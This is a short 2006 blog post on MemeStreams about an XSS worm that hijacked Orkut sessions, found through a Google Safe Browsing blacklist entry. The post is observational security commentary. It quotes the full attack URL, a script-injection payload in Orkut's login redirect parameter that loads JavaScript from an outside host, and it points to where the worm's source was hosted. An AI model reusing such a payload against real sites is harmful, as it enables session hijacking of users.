Create an Account
username: password:
 
  MemeStreams Logo

XSS worm source code for hijacking Orkut accounts

search

Acidus
Picture of Acidus
My Blog
My Profile
My Audience
My Sources
Send Me a Message

sponsored links

Acidus's topics
Arts
Business
Games
Health and Wellness
Home and Garden
Miscellaneous
Current Events
Recreation
Local Information
Science
Society
Sports
Technology

support us

Get MemeStreams Stuff!


 
XSS worm source code for hijacking Orkut accounts
Topic: Technology 4:17 pm EST, Dec  9, 2006

I was running through some proxy logs, and saw a reference to http://sb.google.com/safebrowsing/update?version=goog-black-url:1:-1.

Requesting it redirected me to a blacklist of what look like phishing sites. However, all the way at the bottom was a reference to Google's Orkut site. Specifically the blacklist entry was for a GET-based XSS attack against Google's GLogin system.

https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.js\'></script><!--

If you request that URL, you get a 403 error page saying your query is from an automated attack. Looks very similar to a page Google returned during the Perl.Santy attack a year or so back.

The JavaScript source code to the attack is still available at http://www.probranco.net/xmen.js

It appears that the worm is for hijacking Orkut sessions. Here is an interesting thread when it appear the worm's code was refined.



 
 
Powered By Industrial Memetics
RSS2.0